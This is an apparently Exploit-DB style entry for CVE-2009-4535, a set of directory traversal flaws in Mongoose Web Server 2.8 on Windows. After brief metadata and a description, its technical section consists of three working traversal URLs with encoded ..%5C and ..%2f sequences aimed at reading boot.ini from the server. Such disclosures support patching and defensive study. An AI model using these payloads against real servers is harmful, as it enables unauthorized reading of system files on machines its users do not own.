Mongoose Web Server 2.8 - Multiple Directory Traversals

Author: Dr_IDE
type: remote
platform: windows
port: 
date_added: 2010-04-19 
date_updated:  
verified: 1 
codes: CVE-2009-4535;OSVDB-61490 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commongoose-2.8.exe

################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://code.google.com/p/mongoose/downloads/list
#
################################################################

- Description -

Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.

Mongoose v2.8 is vulnerable to many  remote directory traversal attacks.

- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini

#[pocoftheday.blogspot.com]